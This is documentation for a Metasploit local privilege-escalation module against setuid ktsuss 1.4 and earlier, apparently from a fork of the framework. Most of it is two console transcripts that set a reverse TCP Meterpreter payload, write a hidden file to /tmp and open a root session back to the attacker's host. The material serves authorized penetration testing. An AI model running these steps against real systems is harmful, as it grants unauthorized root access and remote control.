metasploit-gs/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md

## Description

  This module attempts to gain root privileges by exploiting
  a vulnerability in ktsuss versions 1.4 and prior.

  The `ktsuss` executable is setuid `root` and does not drop
  privileges prior to executing user specified commands,
  resulting in command execution with `root` privileges.


## Vulnerable Application

  This module has been tested successfully on:

  * ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64)
  * ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64)


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/ktsuss_suid_priv_esc`
  4. `set SESSION [SESSION]`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

  **KTSUSS_PATH**

  Path to `ktsuss` executable (default: `/usr/bin/ktsuss`)

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)


## Scenarios

### ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64)

  ```
  msf5 > use exploit/linux/local/ktsuss_suid_priv_esc 
  msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check

  [+] /usr/bin/ktsuss is setuid
  [*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test)
  [+] The target is vulnerable.
  msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] /usr/bin/ktsuss is setuid
  [*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test)
  [*] Writing '/tmp/.lBanpIYpAJ60cwt' (389 bytes) ...
  [*] Executing payload ...
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (3021284 bytes) to 172.16.191.137

  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.137:53060) at 2019-08-19 09:18:29 -0400

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.137
  OS           : Sparky 5.8 (Linux 4.19.0-5-amd64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```

### ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64)

  ```
  msf5 > use exploit/linux/local/ktsuss_suid_priv_esc 
  msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check

  [+] /usr/bin/ktsuss is setuid
  [*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test)
  [+] The target is vulnerable.
  msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] /usr/bin/ktsuss is setuid
  [*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test)
  [*] Writing '/tmp/.R0aTPpB8aHk' (389 bytes) ...
  [*] Executing payload ...
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (3021284 bytes) to 172.16.191.167

  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.167:44534) at 2019-08-19 09:25:48 -0400

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.167
  OS           : Sparky 6 (Linux 4.19.0-5-amd64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```